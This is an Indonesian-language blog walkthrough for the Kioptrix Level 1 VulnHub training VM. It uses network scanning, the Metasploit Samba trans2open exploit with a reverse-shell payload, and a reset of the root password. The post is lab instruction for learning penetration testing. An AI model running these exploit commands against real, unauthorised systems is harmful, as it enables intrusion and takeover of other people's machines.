Saturday, October 24, 2020

EKSPLOITASI KIOPTRIX LEVEL 1

 Pertama, kita download terlebih dahulu VM kioptrixnya dengan cara klik link dibawah

https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar

setelah selesai mendownload kita buka menggunakan vmware dan ubah settiingan Network pada kedua OS yaitu kali linux serta kioptrix dan menggunakan BRIDGE.lalu jalankan kioptrix bersama kali linux nya , maka akan tampil sebagai berikut :


untuk memulai eksploitasi kita harus mengetahui ip address kita terlebih dahulu, yaitu dengan cara buka terminal pada kali linux lalu ketikkan perintah : ifconfig

terlihat ip kita yaitu 192.168.100.71. 
kemudian, kita akan melakukan scanning terhadap jaringan yang terhubung satu server dengan perangkat kita yaitu dengan perintah : netdiscover -r 192.168.100.0/24


pada gambar diatas yaitu beberapa daftar ip address yang sedang terbuka. disini kita mulai identifikasi ip manakah yang akan kita coba untuk exploitasi. gunakan ip address yang vendor nya VMware, Inc. karena kita mengoprasikan nya menggunakan VMware.
untuk melakukan pengecekkan apakah ip address tersebut adalah ip target atau bukan, kita ketikkan perintah : nbtscan 192.168.100.70


ternyata ip yang kita pakai tersebut adalah ip target karena terlihat bios name kioptrix. setelah kita mendapatkan ip target nya , kita gunakan konsol metasploit framework dari IP target dengan menggunakan perintah : msfconsole
Setelah mengetikkan perintah diatas tunggu sampai maasuk konsolnya lalu ketikkan perintah di bawah:
  • use auxiliary/scanner/smb/smb_version
  • set RHOSTS 192.168.100.70
  • run

setelah kita melakukan perintah seperti pada gambar diatas, skrang kita melakukan perintah yang bertujuan untuk mengetahui hal apa saja yang rentan untuk dieksploitasi. ketikkan perintah : search trans2open. 
setelah mengetikkan perintah diatas lalu ketikkan perintah di bawah :
  • use exploit/linux/samba/trans2open
  • set RHOSTS 192.168.100.70
  • set payload generic/shell_reverse_tcp
  • run
setelah melakukan perintah diatas maka akan tampil seperti pada gambar di bawah 


disini kita sudah dapat mengatur password untuk kioptrix nya, kita ketikkan perintah 
  • whoami
  • passwd root 
lalu atur password yang kalian gunakan untuk masuk ke kioptrix. dengan contoh seperti pada gambar dibawah :

kita sudah mendapatkan password kioptrix nya, lalu kita langsung saja buka VM kioptrix nya lalo login : root kemudian gunakan password yang telah kita dapatkan saat eksploitasi. maka akan menampilkan tampilan seperti berikut 

 eksploitasi kioptrix level 1 telah berhasil. semoga bermanfaat ya :)

Berikut video tutorial eksploitasi kioptrix level 1 :



at No comments:
Location: Cianjur Regency, West Java, Indonesia
Subscribe to: Posts (Atom)

EKSPLOITASI KIOPTRIX LEVEL 1

 Pertama, kita download terlebih dahulu VM kioptrixnya dengan cara klik link dibawah https://download.vulnhub.com/kioptrix/Kioptrix_Level_1....